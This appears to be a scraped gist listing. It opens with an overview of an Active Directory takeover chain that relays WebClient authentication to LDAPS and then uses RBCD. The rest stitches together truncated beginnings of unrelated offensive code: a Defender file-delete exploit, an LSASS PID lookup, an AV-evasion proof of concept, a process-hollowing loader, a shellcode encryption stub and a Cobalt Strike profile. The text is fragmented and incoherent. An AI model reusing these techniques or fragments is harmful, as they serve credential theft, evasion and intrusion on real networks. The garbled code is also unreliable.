Erik kernel-sanders

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
Relaying that machine authentication to LDAPS for configuring RBCD
RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

	# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
	# All credits go to @itm4n for this PowerShell script!

	# Testing
	# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
	# Real
	# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'

	$JobCode = {
	function DoMpCmdRunLogFileWriteTriggerJob {

	#define _CRT_SECURE_NO_WARNINGS
	#include <Windows.h>
	#include <Psapi.h>
	#include <TlHelp32.h>
	#include <iostream>

	DWORD GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

	/*
	This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes.
	*/

	#include <stdio.h>
	#include <tchar.h>

	#include <windows.h>
	#include "Commctrl.h"
	#include <string>

	using System;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;
	using System.Text;

	namespace Hollowing
	{
	public class Loader
	{
	public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");

	import requests
	import time
	import sys
	from base64 import b64encode
	from requests_ntlm2 import HttpNtlmAuth
	from urllib3.exceptions import InsecureRequestWarning
	from urllib import quote_plus

	requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

	// Copyright (C) 2022 Evan McBroom
	//
	// Permission is hereby granted, free of charge, to any person obtaining a copy
	// of this software and associated documentation files (the "Software"), to deal
	// in the Software without restriction, including without limitation the rights
	// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	// copies of the Software, and to permit persons to whom the Software is
	// furnished to do so, subject to the following conditions:
	//
	// The above copyright notice and this permission notice shall be included in

	#include <Windows.h>

	LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
	typedef VOID(__stdcall* Shellcode)();

	LPBYTE ShellcodeBuffer;
	ULONG_PTR PreviousOffset;
	ULONG_PTR CurrentOffset;
	ULONGLONG InstructionCount;
	DWORD dwOld;

	# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
	# as stage0, remote injecting a thread into a suspended process works

	set host_stage "false";
	set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
	set sleeptime "10000";

	stage {
	set allocator "MapViewOfFile";
	set name "notevil.dll";